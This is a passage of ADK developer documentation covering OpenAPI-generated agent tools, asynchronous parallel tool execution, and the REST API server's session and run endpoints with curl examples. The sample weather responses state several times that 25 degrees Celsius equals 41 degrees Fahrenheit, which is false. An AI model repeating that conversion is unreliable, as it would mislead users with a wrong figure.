If `operationId` is missing, a name is generated from the method and path. - **Tool Description**: Uses the `summary` or `description` from the operation for the LLM. - **API Details**: Stores the required HTTP method, path, server base URL, parameters (path, query, header, cookie), and request body schema internally. 1. **`RestApiTool` Functionality**: Each generated `RestApiTool`: - **Schema Generation**: Dynamically creates a `FunctionDeclaration` based on the operation's parameters and request body. This schema tells the LLM how to call the tool (what arguments are expected). - **Execution**: When called by the LLM, it constructs the correct HTTP request (URL, headers, query params, body) using the arguments provided by the LLM and the details from the OpenAPI spec. It handles authentication (if configured) and executes the API call using the `requests` library. - **Response Handling**: Returns the API response (typically JSON) back to the agent flow. 1. **Authentication**: You can configure global authentication (like API keys or OAuth - see [Authentication](/adk-docs/tools/authentication/) for details) when initializing `OpenAPIToolset`. This authentication configuration is automatically applied to all generated `RestApiTool` instances. ## Usage Workflow Follow these steps to integrate an OpenAPI spec into your agent: 1. **Obtain Spec**: Get your OpenAPI specification document (e.g., load from a `.json` or `.yaml` file, fetch from a URL). 1. **Instantiate Toolset**: Create an `OpenAPIToolset` instance, passing the spec content and type (`spec_str`/`spec_dict`, `spec_str_type`). Provide authentication details (`auth_scheme`, `auth_credential`) if required by the API. ```python from google.adk.tools.openapi_tool.openapi_spec_parser.openapi_toolset import OpenAPIToolset # Example with a JSON string openapi_spec_json = '...' 
# Your OpenAPI JSON string toolset = OpenAPIToolset(spec_str=openapi_spec_json, spec_str_type="json") # Example with a dictionary # openapi_spec_dict = {...} # Your OpenAPI spec as a dict # toolset = OpenAPIToolset(spec_dict=openapi_spec_dict) ``` 1. **Add to Agent**: Include the retrieved tools in your `LlmAgent`'s `tools` list. ```python from google.adk.agents import LlmAgent my_agent = LlmAgent( name="api_interacting_agent", model="gemini-2.0-flash", # Or your preferred model tools=[toolset], # Pass the toolset # ... other agent config ... ) ``` 1. **Instruct Agent**: Update your agent's instructions to inform it about the new API capabilities and the names of the tools it can use (e.g., `list_pets`, `create_pet`). The tool descriptions generated from the spec will also help the LLM. 1. **Run Agent**: Execute your agent using the `Runner`. When the LLM determines it needs to call one of the APIs, it will generate a function call targeting the appropriate `RestApiTool`, which will then handle the HTTP request automatically. ## Example This example demonstrates generating tools from a simple Pet Store OpenAPI spec (using `httpbin.org` for mock responses) and interacting with them via an agent. Code: Pet Store API openapi_example.py ```python # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
import asyncio import uuid # For unique session IDs from dotenv import load_dotenv from google.adk.agents import LlmAgent from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.genai import types # --- OpenAPI Tool Imports --- from google.adk.tools.openapi_tool.openapi_spec_parser.openapi_toolset import OpenAPIToolset # --- Load Environment Variables (If ADK tools need them, e.g., API keys) --- load_dotenv() # Create a .env file in the same directory if needed # --- Constants --- APP_NAME_OPENAPI = "openapi_petstore_app" USER_ID_OPENAPI = "user_openapi_1" SESSION_ID_OPENAPI = f"session_openapi_{uuid.uuid4()}" # Unique session ID AGENT_NAME_OPENAPI = "petstore_manager_agent" GEMINI_MODEL = "gemini-2.0-flash" # --- Sample OpenAPI Specification (JSON String) --- # A basic Pet Store API example using httpbin.org as a mock server openapi_spec_string = """ { "openapi": "3.0.0", "info": { "title": "Simple Pet Store API (Mock)", "version": "1.0.1", "description": "An API to manage pets in a store, using httpbin for responses." }, "servers": [ { "url": "https://httpbin.org", "description": "Mock server (httpbin.org)" } ], "paths": { "/get": { "get": { "summary": "List all pets (Simulated)", "operationId": "listPets", "description": "Simulates returning a list of pets. 
Uses httpbin's /get endpoint which echoes query parameters.", "parameters": [ { "name": "limit", "in": "query", "description": "Maximum number of pets to return", "required": false, "schema": { "type": "integer", "format": "int32" } }, { "name": "status", "in": "query", "description": "Filter pets by status", "required": false, "schema": { "type": "string", "enum": ["available", "pending", "sold"] } } ], "responses": { "200": { "description": "A list of pets (echoed query params).", "content": { "application/json": { "schema": { "type": "object" } } } } } } }, "/post": { "post": { "summary": "Create a pet (Simulated)", "operationId": "createPet", "description": "Simulates adding a new pet. Uses httpbin's /post endpoint which echoes the request body.", "requestBody": { "description": "Pet object to add", "required": true, "content": { "application/json": { "schema": { "type": "object", "required": ["name"], "properties": { "name": {"type": "string", "description": "Name of the pet"}, "tag": {"type": "string", "description": "Optional tag for the pet"} } } } } }, "responses": { "201": { "description": "Pet created successfully (echoed request body).", "content": { "application/json": { "schema": { "type": "object" } } } } } } }, "/get?petId={petId}": { "get": { "summary": "Info for a specific pet (Simulated)", "operationId": "showPetById", "description": "Simulates returning info for a pet ID. 
Uses httpbin's /get endpoint.", "parameters": [ { "name": "petId", "in": "path", "description": "This is actually passed as a query param to httpbin /get", "required": true, "schema": { "type": "integer", "format": "int64" } } ], "responses": { "200": { "description": "Information about the pet (echoed query params)", "content": { "application/json": { "schema": { "type": "object" } } } }, "404": { "description": "Pet not found (simulated)" } } } } } } """ # --- Create OpenAPIToolset --- petstore_toolset = OpenAPIToolset( spec_str=openapi_spec_string, spec_str_type='json', # No authentication needed for httpbin.org ) # --- Agent Definition --- root_agent = LlmAgent( name=AGENT_NAME_OPENAPI, model=GEMINI_MODEL, tools=[petstore_toolset], # Pass the list of RestApiTool objects instruction="""You are a Pet Store assistant managing pets via an API. Use the available tools to fulfill user requests. When creating a pet, confirm the details echoed back by the API. When listing pets, mention any filters used (like limit or status). When showing a pet by ID, state the ID you requested. """, description="Manages a Pet Store using tools generated from an OpenAPI spec." ) # --- Session and Runner Setup --- async def setup_session_and_runner(): session_service_openapi = InMemorySessionService() runner_openapi = Runner( agent=root_agent, app_name=APP_NAME_OPENAPI, session_service=session_service_openapi, ) await session_service_openapi.create_session( app_name=APP_NAME_OPENAPI, user_id=USER_ID_OPENAPI, session_id=SESSION_ID_OPENAPI, ) return runner_openapi # --- Agent Interaction Function --- async def call_openapi_agent_async(query, runner_openapi): print("\n--- Running OpenAPI Pet Store Agent ---") print(f"Query: {query}") content = types.Content(role='user', parts=[types.Part(text=query)]) final_response_text = "Agent did not provide a final text response." 
try: async for event in runner_openapi.run_async( user_id=USER_ID_OPENAPI, session_id=SESSION_ID_OPENAPI, new_message=content ): # Optional: Detailed event logging for debugging # print(f" DEBUG Event: Author={event.author}, Type={'Final' if event.is_final_response() else 'Intermediate'}, Content={str(event.content)[:100]}...") if event.get_function_calls(): call = event.get_function_calls()[0] print(f" Agent Action: Called function '{call.name}' with args {call.args}") elif event.get_function_responses(): response = event.get_function_responses()[0] print(f" Agent Action: Received response for '{response.name}'") # print(f" Tool Response Snippet: {str(response.response)[:200]}...") # Uncomment for response details elif event.is_final_response() and event.content and event.content.parts: # Capture the last final text response final_response_text = event.content.parts[0].text.strip() print(f"Agent Final Response: {final_response_text}") except Exception as e: print(f"An error occurred during agent run: {e}") import traceback traceback.print_exc() # Print full traceback for errors print("-" * 30) # --- Run Examples --- async def run_openapi_example(): runner_openapi = await setup_session_and_runner() # Trigger listPets await call_openapi_agent_async("Show me the pets available.", runner_openapi) # Trigger createPet await call_openapi_agent_async("Please add a new dog named 'Dukey'.", runner_openapi) # Trigger showPetById await call_openapi_agent_async("Get info for pet with ID 123.", runner_openapi) # --- Execute --- if __name__ == "__main__": print("Executing OpenAPI example...") # Use asyncio.run() for top-level execution try: asyncio.run(run_openapi_example()) except RuntimeError as e: if "cannot be called from a running event loop" in str(e): print("Info: Cannot run asyncio.run from a running event loop (e.g., Jupyter/Colab).") # If in Jupyter/Colab, you might need to run like this: # await run_openapi_example() else: raise e print("OpenAPI example finished.") 
```

# Increase tool performance with parallel execution

Supported in ADK: Python v1.10.0

Starting with Agent Development Kit (ADK) version 1.10.0 for Python, the framework attempts to run any agent-requested [function tools](/adk-docs/tools-custom/function-tools/) in parallel. This behavior can significantly improve the performance and responsiveness of your agents, particularly for agents that rely on multiple external APIs or long-running tasks. For example, if you have 3 tools that each take 2 seconds, running them in parallel brings the total execution time closer to 2 seconds instead of 6 seconds.

Running tool functions in parallel helps most in the following scenarios:

- **Research tasks:** Where the agent collects information from multiple sources before proceeding to the next stage of the workflow.
- **API calls:** Where the agent accesses several APIs independently, such as searching for available flights using APIs from multiple airlines.
- **Publishing and communication tasks:** When the agent needs to publish or communicate through multiple, independent channels or to multiple recipients.

However, your custom tools must be built with asynchronous execution support to enable this performance improvement. This guide explains how parallel tool execution works in the ADK and how to build your tools to take full advantage of this processing feature.

Warning

Any ADK Tools that use synchronous processing in a set of tool function calls will block other tools from executing in parallel, even if the other tools allow for parallel execution.

## Build parallel-ready tools

Enable parallel execution of your tool functions by defining them as asynchronous functions. In Python code, this means using `async def` and `await` syntax, which allows the ADK to run them concurrently in an `asyncio` event loop. The following sections show examples of agent tools built for parallel processing and asynchronous operations.
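As a rough illustration of the timing claim above, the following sketch runs three hypothetical async tools concurrently with plain `asyncio.gather()`. It does not use ADK's own scheduler; `fake_tool` and the shortened 0.2-second delay are assumptions made only to keep the demo quick.

```python
import asyncio
import time


async def fake_tool(name: str, delay: float) -> dict:
    """Hypothetical async tool: the sleep stands in for a slow API call."""
    await asyncio.sleep(delay)
    return {"tool": name, "status": "ok"}


async def run_tools_concurrently(delay: float = 0.2):
    """Run three tools at once and report the wall-clock time."""
    start = time.perf_counter()
    results = await asyncio.gather(
        fake_tool("weather", delay),
        fake_tool("flights", delay),
        fake_tool("hotels", delay),
    )
    return results, time.perf_counter() - start


results, elapsed = asyncio.run(run_tools_concurrently())
# Elapsed time should be close to one delay, not three delays added together
print(f"{len(results)} tools finished in {elapsed:.2f}s")
```

Because each tool suspends at `await`, the event loop can overlap the three waits. If any of them used a blocking call instead, the waits would be serialized.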
### Example of HTTP web call

The following code example shows how to modify the `get_weather()` function to operate asynchronously and allow for parallel execution:

```python
import aiohttp

async def get_weather(city: str) -> dict:
    # Non-blocking HTTP request: other tools can run while this one waits
    async with aiohttp.ClientSession() as session:
        async with session.get(f"http://api.weather.com/{city}") as response:
            return await response.json()
```

### Example of database call

The following code example shows how to write a database calling function to operate asynchronously:

```python
import asyncpg

async def query_database(query: str) -> list:
    # asyncpg.connect() is a coroutine, so await it and close the connection explicitly
    conn = await asyncpg.connect("postgresql://...")
    try:
        return await conn.fetch(query)
    finally:
        await conn.close()
```

### Example of yielding behavior for long loops

In cases where a tool is processing multiple requests or numerous long-running requests, consider adding yielding code to allow other tools to execute, as shown in the following code sample:

```python
import asyncio

async def process_data(data: list) -> dict:
    results = []
    for i, item in enumerate(data):
        # process_item is assumed to be an async helper defined elsewhere
        processed = await process_item(item)  # Yield point
        results.append(processed)
        # Add periodic yield points for long loops
        if i % 100 == 0:
            await asyncio.sleep(0)  # Yield control
    return {"results": results}
```

Important

Use the `asyncio.sleep()` function rather than `time.sleep()` for pauses to avoid blocking execution of other functions.
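To make the note about pauses concrete, here is a small sketch, independent of ADK, that counts how many turns a background coroutine gets while another coroutine pauses. The `ticker`, `blocking_pause`, and `cooperative_pause` names are hypothetical and exist only for this demonstration.

```python
import asyncio
import time


async def ticker(counter: list, interval: float = 0.01) -> None:
    """Stand-in for another tool that needs regular turns on the event loop."""
    while True:
        await asyncio.sleep(interval)
        counter[0] += 1


async def blocking_pause() -> None:
    time.sleep(0.2)  # Blocks the whole event loop for the duration


async def cooperative_pause() -> None:
    await asyncio.sleep(0.2)  # Suspends only this coroutine


async def ticks_during(pause) -> int:
    """Return how many times the ticker ran while `pause` was in progress."""
    counter = [0]
    task = asyncio.create_task(ticker(counter))
    await asyncio.sleep(0)  # Give the ticker a chance to start
    await pause()
    ticks = counter[0]
    task.cancel()
    await asyncio.gather(task, return_exceptions=True)  # Swallow the cancellation
    return ticks


blocked_ticks = asyncio.run(ticks_during(blocking_pause))
cooperative_ticks = asyncio.run(ticks_during(cooperative_pause))
print(f"ticks during time.sleep: {blocked_ticks}, during asyncio.sleep: {cooperative_ticks}")
```

The ticker makes no progress during the blocking pause, which is the same effect a synchronous tool has on other tools scheduled alongside it.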
### Example of thread pools for intensive operations

When performing processing-intensive functions, consider creating thread pools for better management of available computing resources, as shown in the following example:

```python
import asyncio
from concurrent.futures import ThreadPoolExecutor

async def cpu_intensive_tool(data: list) -> dict:
    loop = asyncio.get_running_loop()
    # Use thread pool for CPU-bound work so the event loop stays free
    # (expensive_computation is a regular synchronous function defined elsewhere)
    with ThreadPoolExecutor() as executor:
        result = await loop.run_in_executor(executor, expensive_computation, data)
    return {"result": result}
```

### Example of process chunking

When processing long lists or large amounts of data, consider combining a thread pool technique with dividing the work into chunks of data and yielding processing time between the chunks, as shown in the following example:

```python
import asyncio
from concurrent.futures import ThreadPoolExecutor

async def process_large_dataset(dataset: list) -> dict:
    results = []
    chunk_size = 1000
    loop = asyncio.get_running_loop()
    # Reuse one thread pool for all chunks
    # (process_chunk is a regular synchronous function defined elsewhere)
    with ThreadPoolExecutor() as executor:
        for i in range(0, len(dataset), chunk_size):
            chunk = dataset[i:i + chunk_size]
            # Process chunk in thread pool
            chunk_result = await loop.run_in_executor(executor, process_chunk, chunk)
            results.extend(chunk_result)
            # Yield control between chunks
            await asyncio.sleep(0)
    return {"total_processed": len(results), "results": results}
```

## Write parallel-ready prompts and tool descriptions

When building prompts for AI models, consider explicitly specifying or hinting that function calls be made in parallel. The following example of an AI prompt directs the model to use tools in parallel:

```text
When users ask for multiple pieces of information, always call functions in parallel.

Examples:
- "Get weather for London and currency rate USD to EUR" → Call both functions simultaneously
- "Compare cities A and B" → Call get_weather, get_population, get_distance in parallel
- "Analyze multiple stocks" → Call get_stock_price for each stock in parallel

Always prefer multiple specific function calls over single complex calls.
```

The following example shows a tool function description that hints at more efficient use through parallel execution:

```python
import asyncio

async def get_weather(city: str) -> dict:
    """Get current weather for a single city.

    This function is optimized for parallel execution - call multiple times for different cities.

    Args:
        city: Name of the city, for example: 'London', 'New York'

    Returns:
        Weather data including temperature, conditions, humidity
    """
    await asyncio.sleep(2)  # Simulate API call
    return {"city": city, "temp": 72, "condition": "sunny"}
```

## Next steps

For more information on building Tools for agents and function calling, see [Function Tools](/adk-docs/tools-custom/function-tools/). For more detailed examples of tools that take advantage of parallel processing, see the samples in the [adk-python](https://github.com/google/adk-python/tree/main/contributing/samples/parallel_functions) repository.

# Run Agents

# Agent Runtime

Supported in ADK: Python v0.1.0, TypeScript v0.2.0, Go v0.1.0, Java v0.1.0

ADK provides several ways to run and test your agents during development. Choose the method that best fits your development workflow.

## Ways to run agents

- **Dev UI**

  ______________________________________________________________________

  Use `adk web` to launch a browser-based interface for interacting with your agents. [Use the Web Interface](https://google.github.io/adk-docs/runtime/web-interface/index.md)

- **Command Line**

  ______________________________________________________________________

  Use `adk run` to interact with your agents directly in the terminal. [Use the Command Line](https://google.github.io/adk-docs/runtime/command-line/index.md)

- **API Server**

  ______________________________________________________________________

  Use `adk api_server` to expose your agents through a RESTful API.
  [Use the API Server](https://google.github.io/adk-docs/runtime/api-server/index.md)

## Technical reference

For more in-depth information on runtime configuration and behavior, see these pages:

- **[Event Loop](https://google.github.io/adk-docs/runtime/event-loop/index.md)**: Understand the core event loop that powers ADK, including the yield/pause/resume cycle.
- **[Resume Agents](https://google.github.io/adk-docs/runtime/resume/index.md)**: Learn how to resume agent execution from a previous state.
- **[Runtime Config](https://google.github.io/adk-docs/runtime/runconfig/index.md)**: Configure runtime behavior with RunConfig.

# Use the API Server

Supported in ADK: Python v0.1.0, TypeScript v0.2.0, Go v0.1.0, Java v0.1.0

Before you deploy your agent, you should test it to ensure that it is working as intended. Use the API server in ADK to expose your agents through a REST API for programmatic testing and integration.

## Start the API server

Use the following command to run your agent in an ADK API server:

**Python**

```shell
adk api_server
```

**TypeScript**

```shell
npx adk api_server
```

**Go**

```shell
go run agent.go web api
```

**Java**

Make sure to update the port number. With Maven, compile and run the ADK web server:

```console
mvn compile exec:java \
    -Dexec.args="--adk.agents.source-dir=src/main/java/agents --server.port=8080"
```

With Gradle, the `build.gradle` or `build.gradle.kts` build file should have the following Java plugin in its plugins section:

```groovy
plugins {
    id('java')
    // other plugins
}
```

Then, elsewhere in the build file, at the top level, create a new task:

```groovy
tasks.register('runADKWebServer', JavaExec) {
    dependsOn classes
    classpath = sourceSets.main.runtimeClasspath
    mainClass = 'com.google.adk.web.AdkWebServer'
    args '--adk.agents.source-dir=src/main/java/agents', '--server.port=8080'
}
```

Finally, on the command line, run the following command:

```console
gradle runADKWebServer
```

In Java, both the Dev UI and the API server are bundled together.
This command will launch a local web server, where you can run cURL commands or send API requests to test your agent. By default, the server runs on `http://localhost:8000`. Advanced Usage and Debugging For a complete reference on all available endpoints, request/response formats, and tips for debugging (including how to use the interactive API documentation), see the **ADK API Server Guide** below. ## Test locally Testing locally involves launching a local web server, creating a session, and sending queries to your agent. First, ensure you are in the correct working directory. For TypeScript, you should be inside the agent project directory itself. ```console parent_folder/ └── my_sample_agent/ <-- For TypeScript, run commands from here └── agent.py (or Agent.java or agent.ts) ``` **Launch the Local Server** Next, launch the local server using the commands listed above. The output should appear similar to: ```shell INFO: Started server process [12345] INFO: Waiting for application startup. INFO: Application startup complete. INFO: Uvicorn running on http://localhost:8000 (Press CTRL+C to quit) ``` ```shell +-----------------------------------------------------------------------------+ | ADK Web Server started | | | | For local testing, access at http://localhost:8000. | +-----------------------------------------------------------------------------+ ``` ```shell 2025-05-13T23:32:08.972-06:00 INFO 37864 --- [ebServer.main()] o.s.b.w.embedded.tomcat.TomcatWebServer : Tomcat started on port 8080 (http) with context path '/' 2025-05-13T23:32:08.980-06:00 INFO 37864 --- [ebServer.main()] com.google.adk.web.AdkWebServer : Started AdkWebServer in 1.15 seconds (process running for 2.877) 2025-05-13T23:32:08.981-06:00 INFO 37864 --- [ebServer.main()] com.google.adk.web.AdkWebServer : AdkWebServer application started successfully. ``` Your server is now running locally. Ensure you use the correct ***port number*** in all the subsequent commands. 
**Create a new session** With the API server still running, open a new terminal window or tab and create a new session with the agent using: ```shell curl -X POST http://localhost:8000/apps/my_sample_agent/users/u_123/sessions/s_123 \ -H "Content-Type: application/json" \ -d '{"key1": "value1", "key2": 42}' ``` Let's break down what's happening: - `http://localhost:8000/apps/my_sample_agent/users/u_123/sessions/s_123`: This creates a new session for your agent `my_sample_agent`, which is the name of the agent folder, for a user ID (`u_123`) and for a session ID (`s_123`). You can replace `my_sample_agent` with the name of your agent folder. You can replace `u_123` with a specific user ID, and `s_123` with a specific session ID. - `{"key1": "value1", "key2": 42}`: This is optional. You can use this to customize the agent's pre-existing state (dict) when creating the session. This should return the session information if it was created successfully. The output should appear similar to: ```json {"id":"s_123","appName":"my_sample_agent","userId":"u_123","state":{"key1":"value1","key2":42},"events":[],"lastUpdateTime":1743711430.022186} ``` Info You cannot create multiple sessions with exactly the same user ID and session ID. If you try to, you may see a response, like: `{"detail":"Session already exists: s_123"}`. To fix this, you can either delete that session (e.g., `s_123`), or choose a different session ID. **Send a query** There are two ways to send queries via POST to your agent, via the `/run` or `/run_sse` routes. - `POST http://localhost:8000/run`: collects all events as a list and returns the list all at once. Suitable for most users (if you are unsure, we recommend using this one). - `POST http://localhost:8000/run_sse`: returns as Server-Sent-Events, which is a stream of event objects. Suitable for those who want to be notified as soon as the event is available. With `/run_sse`, you can also set `streaming` to `true` to enable token-level streaming. 
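The same requests can be prepared from Python. The sketch below only builds the requests with the standard library and parses `data:` lines from an SSE stream; it does not contact a server. The helper names (`build_create_session_request`, `build_run_request`, `parse_sse_lines`) and `BASE_URL` are assumptions for illustration, not part of ADK.

```python
import json
import urllib.request
from typing import Iterable, Iterator, Optional

BASE_URL = "http://localhost:8000"  # Assumption: default port; adjust to your server


def build_create_session_request(
    app_name: str, user_id: str, session_id: str, state: Optional[dict] = None
) -> urllib.request.Request:
    """Build POST /apps/{app}/users/{user}/sessions/{session} with optional initial state."""
    url = f"{BASE_URL}/apps/{app_name}/users/{user_id}/sessions/{session_id}"
    return urllib.request.Request(
        url,
        data=json.dumps(state or {}).encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def build_run_request(
    app_name: str, user_id: str, session_id: str, text: str,
    sse: bool = False, streaming: bool = False,
) -> urllib.request.Request:
    """Build a POST to /run, or to /run_sse when sse=True."""
    payload = {
        "appName": app_name,
        "userId": user_id,
        "sessionId": session_id,
        "newMessage": {"role": "user", "parts": [{"text": text}]},
    }
    if sse:
        payload["streaming"] = streaming  # Token-level streaming toggle for /run_sse
    return urllib.request.Request(
        f"{BASE_URL}/run_sse" if sse else f"{BASE_URL}/run",
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def parse_sse_lines(lines: Iterable[str]) -> Iterator[dict]:
    """Yield one event dict per 'data: {...}' line, skipping blank lines."""
    for line in lines:
        line = line.strip()
        if line.startswith("data:"):
            yield json.loads(line[len("data:"):])


run_req = build_run_request(
    "my_sample_agent", "u_123", "s_123", "Hey whats the weather in new york today"
)
print(run_req.get_method(), run_req.full_url)
# To actually send it (requires a running API server):
# with urllib.request.urlopen(run_req) as resp:
#     events = json.load(resp)
```

Keeping request construction separate from sending makes the payload shape easy to inspect before pointing it at a live server.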
**Using `/run`** ```shell curl -X POST http://localhost:8000/run \ -H "Content-Type: application/json" \ -d '{ "appName": "my_sample_agent", "userId": "u_123", "sessionId": "s_123", "newMessage": { "role": "user", "parts": [{ "text": "Hey whats the weather in new york today" }] } }' ``` In TypeScript, currently only `camelCase` field names are supported (e.g. `appName`, `userId`, `sessionId`, etc.). If using `/run`, you will see the full output of events at the same time, as a list, which should appear similar to: ```json [{"content":{"parts":[{"functionCall":{"id":"af-e75e946d-c02a-4aad-931e-49e4ab859838","args":{"city":"new york"},"name":"get_weather"}}],"role":"model"},"invocationId":"e-71353f1e-aea1-4821-aa4b-46874a766853","author":"weather_time_agent","actions":{"stateDelta":{},"artifactDelta":{},"requestedAuthConfigs":{}},"longRunningToolIds":[],"id":"2Btee6zW","timestamp":1743712220.385936},{"content":{"parts":[{"functionResponse":{"id":"af-e75e946d-c02a-4aad-931e-49e4ab859838","name":"get_weather","response":{"status":"success","report":"The weather in New York is sunny with a temperature of 25 degrees Celsius (41 degrees Fahrenheit)."}}}],"role":"user"},"invocationId":"e-71353f1e-aea1-4821-aa4b-46874a766853","author":"weather_time_agent","actions":{"stateDelta":{},"artifactDelta":{},"requestedAuthConfigs":{}},"id":"PmWibL2m","timestamp":1743712221.895042},{"content":{"parts":[{"text":"OK. 
The weather in New York is sunny with a temperature of 25 degrees Celsius (41 degrees Fahrenheit).\n"}],"role":"model"},"invocationId":"e-71353f1e-aea1-4821-aa4b-46874a766853","author":"weather_time_agent","actions":{"stateDelta":{},"artifactDelta":{},"requestedAuthConfigs":{}},"id":"sYT42eVC","timestamp":1743712221.899018}] ``` **Using `/run_sse`** ```shell curl -X POST http://localhost:8000/run_sse \ -H "Content-Type: application/json" \ -d '{ "appName": "my_sample_agent", "userId": "u_123", "sessionId": "s_123", "newMessage": { "role": "user", "parts": [{ "text": "Hey whats the weather in new york today" }] }, "streaming": false }' ``` You can set `streaming` to `true` to enable token-level streaming, which means the response will be returned to you in multiple chunks and the output should appear similar to: ```shell data: {"content":{"parts":[{"functionCall":{"id":"af-f83f8af9-f732-46b6-8cb5-7b5b73bbf13d","args":{"city":"new york"},"name":"get_weather"}}],"role":"model"},"invocationId":"e-3f6d7765-5287-419e-9991-5fffa1a75565","author":"weather_time_agent","actions":{"stateDelta":{},"artifactDelta":{},"requestedAuthConfigs":{}},"longRunningToolIds":[],"id":"ptcjaZBa","timestamp":1743712255.313043} data: {"content":{"parts":[{"functionResponse":{"id":"af-f83f8af9-f732-46b6-8cb5-7b5b73bbf13d","name":"get_weather","response":{"status":"success","report":"The weather in New York is sunny with a temperature of 25 degrees Celsius (41 degrees Fahrenheit)."}}}],"role":"user"},"invocationId":"e-3f6d7765-5287-419e-9991-5fffa1a75565","author":"weather_time_agent","actions":{"stateDelta":{},"artifactDelta":{},"requestedAuthConfigs":{}},"id":"5aocxjaq","timestamp":1743712257.387306} data: {"content":{"parts":[{"text":"OK. 
The weather in New York is sunny with a temperature of 25 degrees Celsius (41 degrees Fahrenheit).\n"}],"role":"model"},"invocationId":"e-3f6d7765-5287-419e-9991-5fffa1a75565","author":"weather_time_agent","actions":{"stateDelta":{},"artifactDelta":{},"requestedAuthConfigs":{}},"id":"rAnWGSiV","timestamp":1743712257.391317} ``` **Send a query with a base64 encoded file using `/run` or `/run_sse`** ```shell curl -X POST http://localhost:8000/run \ -H 'Content-Type: application/json' \ -d '{ "appName":"my_sample_agent", "userId":"u_123", "sessionId":"s_123", "newMessage":{ "role":"user", "parts":[ { "text":"Describe this image" }, { "inlineData":{ "displayName":"my_image.png", "data":"iVBORw0KGgoAAAANSUhEUgAAAgAAAAIACAYAAAD0eNT6AAAACXBIWXMAAAsTAAALEwEAmpw...", "mimeType":"image/png" } } ] }, "streaming":false }' ``` Info If you are using `/run_sse`, you should see each event as soon as it becomes available. ## Integrations ADK uses [Callbacks](https://google.github.io/adk-docs/callbacks/index.md) to integrate with third-party observability tools. These integrations capture detailed traces of agent calls and interactions, which are crucial for understanding behavior, debugging issues, and evaluating performance. - [Comet Opik](https://github.com/comet-ml/opik) is an open-source LLM observability and evaluation platform that [natively supports ADK](https://www.comet.com/docs/opik/tracing/integrations/adk). ## Deploy your agent Now that you've verified the local operation of your agent, you're ready to move on to deploying your agent! Here are some ways you can deploy your agent: - Deploy to [Agent Engine](https://google.github.io/adk-docs/deploy/agent-engine/index.md), a simple way to deploy your ADK agents to a managed service in Vertex AI on Google Cloud. - Deploy to [Cloud Run](https://google.github.io/adk-docs/deploy/cloud-run/index.md) and have full control over how you scale and manage your agents using serverless architecture on Google Cloud. 
## Interactive API docs

The API server automatically generates interactive API documentation using Swagger UI. Use it to explore endpoints, understand request formats, and test your agent directly from your browser.

To access the interactive docs, start the API server and navigate to [http://localhost:8000/docs](http://localhost:8000/docs) in your web browser.

You will see a complete, interactive list of all available API endpoints, which you can expand to see detailed information about parameters, request bodies, and response schemas. You can even click "Try it out" to send live requests to your running agents.

## API endpoints

The following sections detail the primary endpoints for interacting with your agents.

JSON Naming Convention

- **Both request and response bodies** use `camelCase` for field names (e.g., `"appName"`).

### Utility endpoints

#### List available agents

Returns a list of all agent applications discovered by the server.

- **Method:** `GET`
- **Path:** `/list-apps`

**Example Request**

```shell
curl -X GET http://localhost:8000/list-apps
```

**Example Response**

```json
["my_sample_agent", "another_agent"]
```

______________________________________________________________________

### Session management

Sessions store the state and event history for a specific user's interaction with an agent.

#### Update a session

Updates an existing session.
- **Method:** `PATCH` - **Path:** `/apps/{app_name}/users/{user_id}/sessions/{session_id}` **Request Body** ```json { "stateDelta": { "key1": "value1", "key2": 42 } } ``` **Example Request** ```shell curl -X PATCH http://localhost:8000/apps/my_sample_agent/users/u_123/sessions/s_abc \ -H "Content-Type: application/json" \ -d '{"stateDelta":{"visit_count": 5}}' ``` **Example Response** ```json {"id":"s_abc","appName":"my_sample_agent","userId":"u_123","state":{"visit_count":5},"events":[],"lastUpdateTime":1743711430.022186} ``` #### Get a session Retrieves the details of a specific session, including its current state and all associated events. - **Method:** `GET` - **Path:** `/apps/{app_name}/users/{user_id}/sessions/{session_id}` **Example Request** ```shell curl -X GET http://localhost:8000/apps/my_sample_agent/users/u_123/sessions/s_abc ``` **Example Response** ```json {"id":"s_abc","appName":"my_sample_agent","userId":"u_123","state":{"visit_count":5},"events":[...],"lastUpdateTime":1743711430.022186} ``` #### Delete a session Deletes a session and all of its associated data. - **Method:** `DELETE` - **Path:** `/apps/{app_name}/users/{user_id}/sessions/{session_id}` **Example Request** ```shell curl -X DELETE http://localhost:8000/apps/my_sample_agent/users/u_123/sessions/s_abc ``` **Example Response** A successful deletion returns an empty response with a `204 No Content` status code. ______________________________________________________________________ ### Agent execution These endpoints are used to send a new message to an agent and get a response. #### Run agent (single response) Executes the agent and returns all generated events in a single JSON array after the run is complete. - **Method:** `POST` - **Path:** `/run` **Request Body** ```json { "appName": "my_sample_agent", "userId": "u_123", "sessionId": "s_abc", "newMessage": { "role": "user", "parts": [ { "text": "What is the capital of France?" 
} ] } } ```

In TypeScript, currently only `camelCase` field names are supported (e.g., `appName`, `userId`, `sessionId`).

**Example Request**

```shell
curl -X POST http://localhost:8000/run \
  -H "Content-Type: application/json" \
  -d '{
    "appName": "my_sample_agent",
    "userId": "u_123",
    "sessionId": "s_abc",
    "newMessage": {
      "role": "user",
      "parts": [{"text": "What is the capital of France?"}]
    }
  }'
```

#### Run agent (streaming)

Executes the agent and streams events back to the client as they are generated, using [Server-Sent Events (SSE)](https://developer.mozilla.org/en-US/docs/Web/API/Server-sent_events).

- **Method:** `POST`
- **Path:** `/run_sse`

**Request Body**

The request body is the same as for `/run`, with an additional optional `streaming` flag.

```json
{
  "appName": "my_sample_agent",
  "userId": "u_123",
  "sessionId": "s_abc",
  "newMessage": {
    "role": "user",
    "parts": [
      {
        "text": "What is the weather in New York?"
      }
    ]
  },
  "streaming": true
}
```

- `streaming`: (Optional) Set to `true` to enable token-level streaming for model responses. Defaults to `false`.

**Example Request**

```shell
curl -X POST http://localhost:8000/run_sse \
  -H "Content-Type: application/json" \
  -d '{
    "appName": "my_sample_agent",
    "userId": "u_123",
    "sessionId": "s_abc",
    "newMessage": {
      "role": "user",
      "parts": [{"text": "What is the weather in New York?"}]
    },
    "streaming": false
  }'
```

# Use the Command Line

Supported in ADK: Python v0.1.0, TypeScript v0.2.0, Go v0.1.0, Java v0.1.0

